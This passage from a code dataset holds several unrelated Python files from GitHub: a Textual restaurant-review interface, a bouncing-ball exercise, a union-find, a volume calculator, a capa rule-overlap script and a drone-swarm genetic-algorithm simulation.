{len(towns)}\")\n for town in towns:\n table.add_row(town.id, town.name, town.id)\n self.query_one(\"#target\").mount(table)\n\n def action_get_rest(self):\n self.query_one(\"#retrieved\").remove()\n rest = CLI.model.restaurants \n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"ID\", \"Name\", \"Address\", \"Phone\", f\"Length: {len(rest)}\")\n for r in rest:\n table.add_row(r.id, r.name, r.address, r.phone)\n self.query_one(\"#target\").mount(table)\n\n def action_get_rev(self):\n self.query_one(\"#retrieved\").remove()\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n rev = CLI.model.reviews\n table.add_columns(\"ID\", \"Review\", \"Star Rating\", f\"Length: {len(rev)}\")\n for r in rev:\n table.add_row(r.id, r.review_text, r.review_rating)\n self.query_one(\"#target\").mount(table)\n pass\n \nclass RelativePage(Screen):\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\"), ('t', 'get_towns_rest()', 'See Restaurants in Towns'), ('r', 'get_rest_rev()', 'See Restaurant Reviews')]\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"View Relations\", classes=\"title\")\n with Container(id='buttons'):\n yield Button(\"View Restaurants in Towns\", id='one')\n yield Button (\"View Reviews for Restaurants\", id='two')\n yield Container(id=\"target\")\n yield Static(id=\"retrieved\")\n\n def on_button_pressed(self, event:Button.Pressed):\n if event.button.id == \"one\":\n self.action_get_towns_rest()\n elif event.button.id == \"two\":\n self.action_get_rest_rev()\n\n def action_get_towns_rest(self):\n towns = CLI.model.towns\n rests = CLI.model.restaurants\n self.query_one(\"#retrieved\").remove()\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"Town\", \"Restaurants\")\n for town in towns:\n table.add_row(town.name, None)\n for rest in rests:\n if rest.town_id == town.id:\n table.add_row(None, rest.name)\n self.query_one(\"#target\").mount(table)\n\n def action_get_rest_rev(self):\n rests = CLI.model.restaurants\n revs = CLI.model.reviews\n towns = CLI.model.towns\n self.query_one(\"#retrieved\").remove()\n table = DataTable(id=\"retrieved\", name=\"Container\", zebra_stripes=True)\n table.add_columns(\"Town\", \"Restaurant\", \"Review\", \"Stars\")\n for town in towns:\n table.add_row(town.name, None, None, None)\n for rest in rests:\n if rest.town_id == town.id:\n table.add_row(None, rest.name, None, None)\n for rev in revs:\n if rev.restaurant_id == rest.id:\n table.add_row(None, None, rev.review_text, rev.review_rating)\n self.query_one(\"#target\").mount(table)\n\n\nclass AddPage(Screen):\n \"\"\"Add\"\"\"\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\"),('t', 'add_town()', \"Add Town\"),('r', 'add_rest()', \"Add Restaurant\"),('v', 'add_rev()', \"Add Review\")]\n\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"Add Data Page\", classes=\"title\")\n yield Container(id=\"listswitch\")\n yield DataTable(id=\"listview\")\n with Horizontal(id=\"buttons\"):\n yield Button(\"Add Town\", id=\"town\")\n yield Button(\"Add Restaurant\", id=\"rest\")\n yield Button(\"Add Review\", id=\"rev\")\n with ContentSwitcher(id=\"switcher\", initial=\"town\"):\n with Container(id=\"town\"):\n yield Input(placeholder=\"Town Name\", id=\"town_name\")\n yield Input(placeholder=\"Town State\", id=\"town_state\")\n yield Button(\"Submit\", id=\"town_submit\")\n with Container(id=\"rest\"):\n yield Input(placeholder=\"Restaurant Name\", id=\"rest_name\")\n yield Input(placeholder=\"Address\", id=\"rest_address\")\n yield Input(placeholder=\"Phone\", id=\"rest_phone\")\n yield Input(placeholder=\"Residing Town ID\", id=\"rest_town\")\n yield Button(\"Submit\", id=\"rest_submit\")\n with Container(id=\"rev\"):\n yield Input(placeholder=\"Rating Text\", id=\"rev_text\")\n yield Input(placeholder=\"Stars\", id=\"rev_stars\")\n yield Input(placeholder=\"Pertaining Restaurant ID\", id=\"rev_rest\")\n yield Button(\"Submit\", id=\"rev_submit\")\n\n def on_button_pressed(self, event:Button.Pressed):\n #SWITCH BUTTONS\n if event.button.id == \"town\":\n self.query_one(\"#switcher\").current=event.button.id\n self.pop_town()\n if event.button.id == \"rest\":\n self.query_one(\"#switcher\").current=event.button.id\n self.pop_town()\n if event.button.id == \"rev\":\n self.query_one(\"#switcher\").current=event.button.id\n self.pop_rest()\n #END SWITCH BUTTONS\n\n #SUBMIT BUTTONS\n if event.button.id == \"town_submit\":\n town_name = self.query_one(\"#town_name\").value\n town_state = self.query_one(\"#town_state\").value\n new_town = Town(name=town_name, state=town_state)\n self.add_town(new_town)\n if event.button.id == \"rest_submit\":\n rest_name = self.query_one(\"#rest_name\").value\n rest_address = self.query_one(\"#rest_address\").value\n rest_phone = self.query_one(\"#rest_phone\").value\n rest_town = self.query_one(\"#rest_town\").value\n new_rest = Restaurant(name=rest_name, address=rest_address, phone=rest_phone, town_id=rest_town)\n self.add_rest(new_rest)\n if event.button.id == \"rev_submit\":\n rev_text = self.query_one(\"#rev_text\").value\n rev_stars = self.query_one(\"#rev_stars\").value\n rev_rest = self.query_one(\"#rev_rest\").value\n new_rev = Review(review_text=rev_text, review_rating=rev_stars, restaurant_id=rev_rest)\n self.add_rev(new_rev)\n #END SUBMIT BUTTONS\n\n #SQL QUERIES\n\n def add_town(self, town):\n session = CLI.model.session\n session.add(town)\n session.commit()\n CLI.model.towns.append(town)\n def add_rest(self, rest):\n session = CLI.model.session\n session.add(rest)\n session.commit()\n CLI.model.restaurants.append(rest)\n def add_rev(self, rev):\n session = CLI.model.session\n session.add(rev)\n session.commit()\n CLI.model.reviews.append(rev)\n \n #END SQL QUERIES\n\n #TABLE OPERATIONS\n\n def add_table(self, table):\n self.query_one('#listview').remove()\n self.query_one(\"#listswitch\").mount(table)\n\n\n def pop_town(self):\n t_t = DataTable(id=\"listview\", zebra_stripes=True)\n towns = CLI.model.towns\n t_t.add_columns(\"ID\", \"Town Name\", \"State\", f\"Length: {len(towns)}\")\n for town in towns:\n t_t.add_row(town.id, town.name, town.state)\n self.add_table(t_t)\n\n def pop_rest(self):\n r_t = DataTable(id=\"listview\", zebra_stripes=True)\n rest = CLI.model.restaurants\n r_t.add_columns(\"ID\", \"Name\", \"Address\", \"Phone\", f\"Length: {len(rest)}\")\n for r in rest:\n r_t.add_row(r.id, r.name, r.address, r.phone)\n self.add_table(r_t)\n \n def pop_rev(self):\n v_t = DataTable(id=\"listview\", zebra_stripes=True)\n rev = CLI.model.reviews\n v_t.add_columns(\"ID\", \"Review\", \"Star Rating\", f\"Length: {len(rev)}\")\n for r in rev:\n v_t.add_row(r.id, r.review_text, r.review_rating)\n self.add_table(v_t)\n\n #END TABLE OPERATIONS\n\n #HOT KEY ACTIONS\n\n def action_add_town(self):\n self.query_one(\"#switcher\").current=\"town\"\n self.pop_town()\n def action_add_rest(self):\n self.query_one(\"#switcher\").current=\"rest\"\n self.pop_town()\n def action_add_rev(self):\n self.query_one(\"#switcher\").current=\"rev\"\n self.pop_rest()\n\n #END HOT KEY ACTIONS\n\nclass AboutPage(Screen):\n\n BINDINGS=[('q', \"pop_screen()\", \"Go Back\")]\n\n def compose(self):\n yield Header(show_clock=True)\n yield Footer()\n yield Static(\"Raymond An\")\n yield Static(\"Mark Coats\")\n yield Static(\"Kyle O'Neill\")\n\n\n\nclass CLI(App):\n \"\"\"A Textual app to find restaurants and reviews.\"\"\"\n\n data = {\n \"username\": ''\n }\n model = Model()\n\n CSS_PATH=\"cli.css\"\n SCREENS= {\"Login\": LoginPage(), \"Menu\": MainPage(), \"Retrieve\": RetrievePage(), \"Relative\": RelativePage(), \"Add\": AddPage(), \"about\": AboutPage()}\n BINDINGS = [('q', \"exit\", 'Exit'),(\"d\", \"toggle_dark\", \"Toggle dark mode\"), (\"p\", \"about\", \"About\")]\n\n def on_mount(self):\n self.push_screen(\"Login\")\n\n def action_toggle_dark(self) -> None:\n \"\"\"An action to toggle dark mode.\"\"\"\n self.dark = not self.dark\n def action_exit(self):\n self.exit(\"Exiting\")\n def action_about(self):\n self.push_screen(\"about\")\n\n\nif __name__ == \"__main__\":\n app = CLI()\n app.run()\n","repo_name":"MarKSmaN98/P3P_P2","sub_path":"lib/textualInterface.py","file_name":"textualInterface.py","file_ext":"py","file_size_in_byte":13587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15998921412","text":"\"\"\"\n6、一个小球从100m的高度落下,每次弹回原高度的一半。\n 计算:总共弹起来多少次(最小弹起高度0.01m)\n 总共走了多少米?\n\"\"\"\n\nheight = 100\ncount = 0\ndistance = 0\n\nwhile height >= 0.01:\n # 上面的判断条件也可以改成height/2>=0.01,这样次数可以对了,\n # 但是最后一次的距离没有加上,所以后面的代码也有更改。如21行后面所示。\n count += 1 # 每次触地,计数加1\n height = 0.5 * height\n distance += 3 * height\n\nprint(f\"总共弹起来{count-1}次\") # 最后一次触地后不弹起,所以弹起数量要加1\nprint(f\"总共弹起的高度{distance-height:0.2f}米\") # 同理,最后一次触地后弹起的高度在上面的循环里已经加上了,必须要再减去\n\nheight = 100\ncount = 0\ndistance = 0\n\nwhile height/2 >= 0.01:\n count += 1\n height = 0.5 * height\n distance += 3 * height\n\nprint(f\"总共弹起来{count}次\")\nprint(f\"总共弹起的高度{distance+height:0.2f}米\")\n","repo_name":"bayernerxz/Tedu_Python","sub_path":"stage01/code/day05/review/exercise04.py","file_name":"exercise04.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41159777164","text":"class Union_find:\r\n def __init__(self, n):\r\n self.par: list[int] = [x for x in range(n + 1)]\r\n self.rank: list[int] = [0] * (n + 1)\r\n\r\n def root(self, x) -> int:\r\n if self.par[x] == x:\r\n return x\r\n else:\r\n self.par[x] = self.root(self.par[x]) # 路径压缩\r\n return self.par[x]\r\n\r\n def union(self, x, y) -> None:\r\n if self.root(x) == self.root(y):\r\n return None\r\n else:\r\n if self.rank[x] >= self.rank[y]:\r\n self.par[self.root(y)] = self.par[self.root(x)]\r\n else:\r\n self.par[self.root(x)] = self.par[self.root(y)]\r\n\r\n\r\nn, q = map(int, input().split())\r\nuf = Union_find(n)\r\nfor _ in range(q):\r\n t, u, v = map(int, input().split())\r\n if t == 0:\r\n uf.union(u, v)\r\n else:\r\n if uf.root(u) == uf.root(v):\r\n print(1)\r\n else:\r\n print(0)\r\n","repo_name":"xmkp2469/Disjoint-Set-Union","sub_path":"Disjoint Set Union/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7734595813","text":"#Nicholas Gardi Assignment 2\r\n\r\n#import math to use the exact value of pi\r\nimport math\r\n\r\n#defining the function for volume of a cube\r\ndef cubeVolume(sideLength):\r\n sideLength = float(input(\"Enter the side length of the cube: \"))\r\n volume = sideLength ** 3\r\n return volume\r\n\r\n#defining the function for volume of a pyramid\r\ndef pyramidVolume(baseLength, heightLength):\r\n baseLength = float(input(\"Enter the base length of the pyramid: \"))\r\n heightLength = float(input(\"Enter the height length of the pyramid: \"))\r\n volume = (1/3)*(baseLength ** 2)*(heightLength)\r\n return volume\r\n\r\n#defining the function for volume of a ellipsoid\r\ndef ellipsoidVolume(rediusLength):\r\n radiusLength = float(input(\"Enter the length of the radius of the ellipsoid: \"))\r\n volume = (3/4)*(math.pi)*(radiusLength ** 3)\r\n return volume\r\n\r\n#defining the lists to contain the final volumes\r\ncubeList = []\r\npyramidList = []\r\nellipsoidList = []\r\n\r\n#while loop to continue asking for inputs until the user types in quit\r\ni = 1\r\nwhile i > 0:\r\n shape = input(\"Enter the shape(Cube, Pyramid, Ellipsoid) for which you would like to calculate the volume of, or type 'quit' to end the program: \").lower()\r\n #validating the user input\r\n if shape not in (\"cube\", \"pyramid\", \"ellipsoid\", \"quit\"):\r\n print(\"Please enter one of the folowing choices below: cube, pyramid, ellipsoid, or quit.\")\r\n #calling the cube volume function and added the answer to the list\r\n if shape == \"cube\":\r\n sideLength = 0\r\n cubeList.append(cubeVolume(sideLength))\r\n #calling the pyramid volume function and added the answer to the list\r\n if shape == \"pyramid\":\r\n baseLength = 0\r\n heightLength = 0\r\n pyramidList.append(pyramidVolume(baseLength, heightLength))\r\n #calling the ellipsoid volume function and added the answer to the list\r\n if shape == \"ellipsoid\":\r\n radiusLength = 0\r\n ellipsoidList.append(ellipsoidVolume(radiusLength))\r\n if shape == \"quit\":\r\n #stopping the while loop and printing out the required strings/volumes\r\n if cubeList == [] and pyramidList == [] and ellipsoidList == []:\r\n i = -1\r\n print(\"You have come to the end of the session.\")\r\n print(\"You did not perform any volume calculations\")\r\n else:\r\n #sorting the lists\r\n cubeList.sort()\r\n pyramidList.sort()\r\n ellipsoidList.sort()\r\n i = -1\r\n print(\"You have come to the end of the session.\")\r\n print(\"The volumes calculated for each shape are shown below\")\r\n print(\"Cube: \" + str(cubeList)[1:-1])\r\n print(\"Pyramid: \" + str(pyramidList)[1:-1])\r\n print(\"Ellipsoid: \" + str(ellipsoidList)[1:-1])\r\n","repo_name":"NickGardi/CS1026-Python","sub_path":"VolumeCalculator.py","file_name":"VolumeCalculator.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31049848095","text":"import sys\nimport logging\nimport argparse\nfrom typing import Set\nfrom pathlib import Path\n\nimport capa.main\nimport capa.rules\nfrom capa.features.common import Feature\n\nlogger = logging.getLogger(\"detect_duplicate_features\")\n\n\ndef get_features(rule_path: str) -> Set[Feature]:\n \"\"\"\n Extracts all features from a given rule file.\n\n Args:\n rule_path (str): The path to the rule file to extract features from.\n\n Returns:\n set: A set of all feature statements contained within the rule file.\n \"\"\"\n with Path(rule_path).open(\"r\", encoding=\"utf-8\") as f:\n try:\n new_rule = capa.rules.Rule.from_yaml(f.read())\n return new_rule.extract_all_features()\n except Exception as e:\n logger.error(\"Error: New rule %s %s %s\", rule_path, str(type(e)), str(e))\n sys.exit(-1)\n\n\ndef find_overlapping_rules(new_rule_path, rules_path):\n if not new_rule_path.endswith(\".yml\"):\n logger.error(\"FileNotFoundError ! New rule file name doesn't end with .yml\")\n sys.exit(-1)\n\n # Loads features of new rule in a list.\n new_rule_features = get_features(new_rule_path)\n count = 0\n overlapping_rules = []\n\n # capa.rules.RuleSet stores all rules in given paths\n ruleset = capa.main.get_rules(rules_path)\n\n for rule_name, rule in ruleset.rules.items():\n rule_features = rule.extract_all_features()\n\n if not len(rule_features):\n continue\n count += 1\n # Checks if any features match between existing and new rule.\n if any(feature in rule_features for feature in new_rule_features):\n overlapping_rules.append(rule_name)\n\n result = {\"overlapping_rules\": overlapping_rules, \"count\": count}\n return result\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Find overlapping features in Capa rules.\")\n\n parser.add_argument(\"rules\", type=str, action=\"append\", help=\"Path to rules\")\n parser.add_argument(\"new_rule\", type=str, help=\"Path to new rule\")\n\n args = parser.parse_args()\n\n new_rule_path = args.new_rule\n rules_path = [Path(rule) for rule in args.rules]\n\n result = find_overlapping_rules(new_rule_path, rules_path)\n\n print(\"\\nNew rule path : %s\" % new_rule_path)\n print(\"Number of rules checked : %s \" % result[\"count\"])\n if result[\"overlapping_rules\"]:\n print(\"Paths to overlapping rules : \")\n for r in result[\"overlapping_rules\"]:\n print(\"- %s\" % r)\n else:\n print(\"Paths to overlapping rules : None\")\n print(\"Number of rules containing same features : %s\" % len(result[\"overlapping_rules\"]))\n print(\"\\n\")\n\n return len(result[\"overlapping_rules\"])\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"mandiant/capa","sub_path":"scripts/detect_duplicate_features.py","file_name":"detect_duplicate_features.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":3385,"dataset":"github-code","pt":"47"} +{"seq_id":"8547858214","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom copy import deepcopy\nfrom matplotlib import animation\nfrom matplotlib import rc\n####################### Defining Project Constants ############################\n\n## System Parameters\nNm = 15 # number of initial agents\nNo = 25 # number of obstacles\nNt = 100 # number of targets to map\n\n## Physical Parameters\nAi = 1 # agent characteristic area (m^2)\nCdi = 0.25 # agent coefficient of drag\nmi = 10 # agent mass (kg)\nva = [-0.2, 0.2, 0.5] # Air velocity (m/s)\nra = 1.225 # Air Density (kg/m^3)\nFp = 200 # Propolsion force magnitude (N)\n\n## Time Stepping Parameters\ndt = 0.2 # time step size (s)\ntf = 60 # Maximium task time (s)\n\n## Object Interaction Parameters\nagent_sight = 5 # maximum target mapping distance\ncrash_range = 2 # agent collision distance\n\n## Genetic Algorithm Parameters\nK = 6 # Strings generated by breeding\nP = 6 # Surviving strings for breeding\nS = 20 # Design strings per generation\nG = 100 # Total Generations\nminLam = 0. # Minimum value of design strings\nmaxLam = 2. # Maximum value of design strings\nnumLam = 15\n\nw1 = 70 # Weight of mapping in net cost\nw2 = 10 # Weight of time usage in net cost\nw3 = 20 # Weight of agent losses in net cost\n\n## Domain Parameters\nxmax = 150 # x bound of domain\nymax = 150 # y bound of domain\nzmax = 60 # z bound of domain\n\nlocx = 100 # x bound of target/obstacle region \nlocy = 100 # y bound of target/obstacle region \nlocz = 10 # z bound of target/obstacle region \n\n## Initial Target, Obstacle, Agent Positions\nobs = np.array([(locx - (-locx))*np.random.rand(No) + (-locx), (locy - (-locy))*np.random.rand(No) + (-locy),\n (locz - (-locz))*np.random.rand(No) + (-locz)]) # Initial Obstacle Locations\n\nobs = obs.T\n\ntar = np.array([(locx - (-locx))*np.random.rand(Nt) + (-locx), (locy - (-locy))*np.random.rand(Nt) + (-locy),\n (locz - (-locz))*np.random.rand(Nt) + (-locz)]) # Initial Target Locations\n\ntar = tar.T\ntar0 = deepcopy(np.array(tar))\npos = np.array([(xmax - 0.05*xmax)*np.ones(Nm), np.linspace(-ymax + 0.05*ymax, ymax - 0.05*ymax, Nm), \n np.zeros(Nm)]) # Initial Agent Location\n\npos = pos.T\n\npos0 = deepcopy(np.array(pos))\n\nvel = np.zeros([Nm,3]) # Initial Agent velocities\nvel0 = np.zeros([Nm,3])\n###############################################################################\n############################## Plotting Initial System ########################\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(obs[:,0],obs[:,1],obs[:,2],color = 'r')\nax.scatter(tar[:,0],tar[:,1],tar[:,2],color = 'g')\nax.scatter(pos[:,0],pos[:,1],pos[:,2],color = 'k')\nax.set_xlabel('X (m)')\nax.set_ylabel('Y (m)')\nax.set_zlabel('Z (m)')\nax.view_init(elev=70., azim=40)\nax.legend(['Obstacles','Targets','Agents'])\n################################## Drone Simulation Function ####################################################\n\ndef droneSim(Nm,No,Nt,w1,w2,w3,Lam,dt,tf,pos,vel,tar,obs):\n\n Nt0 = Nt # Saving initial number of targets for cost calculation\n Nm0 = Nm # Saving initial number of agents for cost calculation\n \n # Assigning design string to associated variables \n Wmt = Lam[0] \n Wmo = Lam[1] \n Wmm = Lam[2] \n\n wt1 = Lam[3]\n wt2 = Lam[4]\n \n wo1 = Lam[5] \n wo2 = Lam[6]\n \n wm1 = Lam[7] \n wm2 = Lam[8]\n \n a1 = Lam[9]\n a2 = Lam[10] \n\n b1 = Lam[11]\n b2 = Lam[12]\n\n c1 = Lam[13]\n c2 = Lam[14]\n\n\n ts = int(np.ceil(tf/dt)) # Max Number of time steps\n\n c = 0 # counter for actual number of time steps\n\n # Initialize agent and target position arrays for plotting\n posTot = list()\n tarTot = list()\n\n posTot.append(deepcopy(np.array(pos))) # array to save all positions of agents at every time step\n tarTot.append(deepcopy(np.array(tar))) # array to save all positions of agents at every time step\n\n for i in range(ts): # Loop through all time\n \n if Nt <= 0 or Nm <= 0: # If all targets or agents have crashed, stop simulating\n break\n\n c = c + 1 # Keep track of time step\n\n # Initialize distance arrays between targets, agents, and obstacles\n dmt = np.array(np.zeros((3,Nm,Nt)))\n dmm = np.array(np.zeros((3,Nm,Nm)))\n dmo = np.array(np.zeros((3,Nm,No)))\n\n\n # Loop through agents\n for j in range(Nm):\n \n dmt[:,j,:] = np.array((tar - pos[j,:]).T) # distance b/w agent j and all targets\n\n dmm[:,j,:] = np.array((pos - pos[j,:]).T) # distance b/w agent j and all other agents\n \n dmm[:,j,j] = float('inf') # Marker so we are not considering distance between agent and itself\n\n dmo[:,j,:] = np.array((obs - pos[j,:]).T) # distance b/w agent j and all obstacles\n\n\n # Calculate magnitude of distances between all objects\n magdmt = np.array(np.linalg.norm(dmt,2,0))\n magdmm = np.array(np.linalg.norm(dmm,2,0))\n magdmo = np.array(np.linalg.norm(dmo,2,0))\n\n # Determine which targets have been mapped\n tar_map = np.array(np.where(magdmt < agent_sight)) #produces 2 1-D arrays: 1st array:row, 2nd array:column\n\n # Determined which agents have crashed into one another\n mm_crash = np.array(np.where(magdmm < crash_range))\n\n # Determine which agents have crashed into obstacles\n mo_crash = np.array(np.where(magdmo < crash_range))\n\n # Determine which agents have moved outside domain in each dimension\n x_crash = np.array(np.where(np.abs(pos[:,0]) > xmax))\n y_crash = np.array(np.where(np.abs(pos[:,1]) > ymax))\n z_crash = np.array(np.where(np.abs(pos[:,2]) > zmax))\n\n # Combine all domain crashes together (unique since there could be overlap)\n dom_crash = np.unique(np.hstack((x_crash[0,:], y_crash[0,:], z_crash[0,:])))\n\n # Generate index arrays to determine which targets to remove and which agents to remove\n tarRem = np.array(np.unique(tar_map[1,:])) #access the column indices for tar_map --> target indices\n ageRem = np.unique(np.hstack([mm_crash[0,:], mo_crash[0,:], dom_crash])) #access the row indices for mm/mo --> agent/obstacle indices\n \n # use -inf as marker to distinguish between agent j-j marker and remove agent marker\n magdmm[magdmm == float('inf')] = float('-inf')\n dmm[dmm == float('inf')] = float('-inf')\n\n if (tarRem.size > 0 or ageRem.size > 0): # Only remove objects if targets mapped or agents crash\n\n # Determine new number of targets and new number of agents\n Nt = Nt - np.size(tarRem)\n Nm = Nm - np.size(ageRem)\n \n if Nt <= 0 or Nm <= 0: # If all targets or agents have crashed, stop simulating\n break\n \n if tarRem.size > 0: # If statement for target mapping\n \n # Use +inf as remove target marker\n magdmt[:,tarRem] = float('inf')\n dmt[:,:,tarRem] = float('inf')\n tar[tarRem,:] = float('inf')\n \n if ageRem.size > 0:\n \n # Use +inf as remove agent marker\n magdmt[ageRem,:] = float('inf')\n dmt[:,ageRem,:] = float('inf')\n magdmm[ageRem,:] = float('inf')\n magdmm[:,ageRem] = float('inf')\n dmm[:,ageRem,:] = float('inf')\n dmm[:,:,ageRem] = float('inf')\n magdmo[ageRem,:] = float('inf')\n dmo[:,ageRem,:] = float('inf')\n pos[ageRem,:] = float('inf')\n vel[ageRem,:] = float('inf')\n\n # Remove and reshape arrays to account for removal of all targets and agents\n magdmt = np.array(np.reshape(magdmt[magdmt != float('inf')],[Nm,Nt]))\n dmt = np.array(np.reshape(dmt[dmt != float('inf')],[3,Nm,Nt]))\n magdmo = np.array(np.reshape(magdmo[magdmo != float('inf')],[Nm,No]))\n dmo = np.array(np.reshape(dmo[dmo != float('inf')],[3,Nm,No]))\n magdmm = np.array(np.reshape(magdmm[magdmm != float('inf')],[Nm,Nm]))\n dmm = np.array(np.reshape(dmm[dmm != float('inf')],[3,Nm,Nm]))\n pos = np.array(np.reshape(pos[pos != float('inf')],[Nm,3]))\n vel = np.array(np.reshape(vel[vel != float('inf')],[Nm,3]))\n tar = np.array(np.reshape(tar[tar != float('inf')],[Nt,3]))\n\n tarTot.append(tar[:]) # save new target positions\n \n # Remove and reshape array for j-j agent interactions which we ignore \n magdmm = np.array(np.reshape(magdmm[magdmm != float('-inf')],[Nm,Nm-1]))\n dmm = np.array(dmm[dmm != float('-inf')])\n dmm = np.reshape(dmm,[3,Nm,Nm-1])\n\n # Calculate unit normal vector between all objects\n nmt = dmt / magdmt[np.newaxis,:,:]\n nmm = dmm / magdmm[np.newaxis,:,:]\n nmo = dmo / magdmo[np.newaxis,:,:]\n\n \n # Calculate scaled direction vectors between objects\n nhatmt = (wt1*np.exp(-a1*magdmt) - wt2*np.exp(-a2*magdmt))\n nhatmt = nhatmt[np.newaxis,:,:]*nmt\n\n nhatmm = (wm1*np.exp(-c1*magdmm) - wm2*np.exp(-c2*magdmm))\n nhatmm = nhatmm[np.newaxis,:,:]*nmm\n\n nhatmo = (wo1*np.exp(-b1*magdmo) - wo2*np.exp(-b2*magdmo))\n nhatmo = nhatmo[np.newaxis,:,:]*nmo\n\n # Sum up all iteraction vectors for each agent\n Nmt = np.sum(nhatmt,2)\n Nmm = np.sum(nhatmm,2)\n Nmo = np.sum(nhatmo,2)\n\n # Calculate the total force vectors for each agent\n Ntot = (Wmt*Nmt.T + Wmm *Nmm.T + Wmo*Nmo.T)\n\n # Obtain magnitude of force vector\n nDum = np.linalg.norm(Ntot,2,1)\n\n # Normalize force vector for each agent\n nstar = Ntot / nDum[:,np.newaxis]\n\n # Calculate drag force on all agents\n Fd = 0.5*ra*Cdi*Ai*((va-vel).T*np.linalg.norm(va - vel,2,1)).T\n\n # Calculate the total force on all agents\n Ftot = Fp*nstar + Fd\n\n # Update the velocity for each agent using forward euler\n vel += dt*Ftot/mi\n\n # Update the position for each agent using forward euler\n pos += (vel*dt)\n\n # Save the position of each agent\n posTot.append(pos[:])\n \n # Calculate Mstar, Tstar, Lstar for cost calculation\n Mstar = (Nt/Nt0)\n Tstar = ((c*dt)/tf)\n Lstar = ((Nm0 - Nm)/Nm0)\n \n # Calculate the cost for this simulation\n Pi = w1*Mstar + w2*Tstar + w3*Lstar\n \n return(Pi, posTot, tarTot, c, Mstar,Tstar,Lstar)\n################################# Genetic Algorithm Function #######################################################\n\ndef myGA(S,G,P,K,minLam,maxLam,numLam,Nm,No,Nt,w1,w2,w3,dt,tf,pos,vel):\n \n # Initialize all variables to be saved\n Min = np.zeros(G) # Minimum cost for each generation\n PAve = np.zeros(G) # Parent average for each generation\n Ave = np.zeros(G) # Total population average for each generation\n \n Pi = np.zeros(S) # All costs in an individual generation\n Mstar = np.zeros(S) # All Mstar values in each generation\n Tstar = np.zeros(S) # All Tstar values in each generation\n Lstar = np.zeros(S) # All Lstar values in each generation\n \n MstarMin = np.zeros(G) # Mstar value associated with best cost for each generation\n TstarMin = np.zeros(G) # Tstar value associated with best cost for each generation\n LstarMin = np.zeros(G) # Lstar value associated with best cost for each generation\n \n MstarPAve = np.zeros(G) # Average Mstar value for top parents for each generation\n TstarPAve = np.zeros(G) # Average Tstar value for top parents for each generation\n LstarPAve = np.zeros(G) # Average Lstar value for top parents for each generation\n \n MstarAve = np.zeros(G) # Average Mstar value for whole population for each generation\n TstarAve = np.zeros(G) # Average Tstar value for whole population for each generation\n LstarAve = np.zeros(G) # Average Lstar value for whole population for each generation\n \n # Generate initial random population\n Lam = (maxLam - minLam)*np.random.rand(numLam,S) + minLam\n \n # Initially, calculate cost for all strings. After, only calculate new strings since top P already calculated\n start = 0 \n \n for i in range(G): # Loop through generations\n \n # Calculate fitness of unknown design string costs\n for j in range(start,S): # Evaluate fitness of strings\n Pi[j], _, _, _, Mstar[j], Tstar[j], Lstar[j] = droneSim(Nm,No,Nt,w1,w2,w3,Lam[:,j],dt,tf,pos,vel,tar,obs)\n \n \n # Sort cost and design strings based on performance\n ind = np.argsort(Pi)\n Pi = np.sort(Pi)\n Lam = Lam[:,ind]\n Mstar = Mstar[ind]\n Tstar = Tstar[ind]\n Lstar = Lstar[ind]\n \n # Generate offspring radnom parameters and indices for vectorized offspring calculation\n phi = np.random.rand(numLam,K)\n ind1 = range(0,K,2)\n ind2 = range(1,K,2)\n \n # Concatonate original parents children, and new random strings all together into new design string array\n Lam = np.hstack((Lam[:,0:P], phi[:,ind1]*Lam[:,ind1] + (1-phi[:,ind1])*Lam[:,ind2],\n phi[:,ind2]*Lam[:,ind2] + (1-phi[:,ind2])*Lam[:,ind1], \n (maxLam - minLam)*np.random.rand(numLam,S-P-K) + minLam));\n \n # Save all requested values\n Min[i] = Pi[0]\n PAve[i] = np.mean(Pi[0:P])\n Ave[i] = np.mean(Pi)\n \n MstarMin[i] = Mstar[0]\n TstarMin[i] = Tstar[0]\n LstarMin[i] = Lstar[0]\n \n MstarPAve[i] = np.mean(Mstar[0:P])\n TstarPAve[i] = np.mean(Tstar[0:P])\n LstarPAve[i] = np.mean(Lstar[0:P])\n \n MstarAve[i] = np.mean(Mstar)\n TstarAve[i] = np.mean(Tstar)\n LstarAve[i] = np.mean(Lstar)\n \n # Update start to P such that only new string cost values are calculated\n start = P\n \n # Print miminum value of cost for debugging (should monotonically decrease over generations)\n print(Min[i])\n \n return(Lam, Pi, Min, PAve, Ave, MstarMin, TstarMin, LstarMin, MstarPAve, TstarPAve, LstarPAve, \n MstarAve, TstarAve, LstarAve)\n\n# Call GA function\nLam, Pi, Min, PAve, Ave, MstarMin, TstarMin, LstarMin, MstarPAve, TstarPAve, LstarPAve, MstarAve, TstarAve, LstarAve= myGA(S,G,P,K,minLam,maxLam,numLam,Nm,No,Nt,w1,w2,w3,dt,tf,pos,vel)\nfig1 = plt.figure(figsize=(12,5))\nplt.semilogy(range(0,G),Min)\nplt.semilogy(range(0,G),PAve)\nplt.semilogy(range(0,G),Ave)\nplt.xlabel('Generation')\nplt.ylabel('Min or Ave cost')\nplt.title('Cost Evolution')\nplt.legend(['Best Cost', 'Average Parent Cost','Average Cost'])\nplt.show()\n\nfig2 = 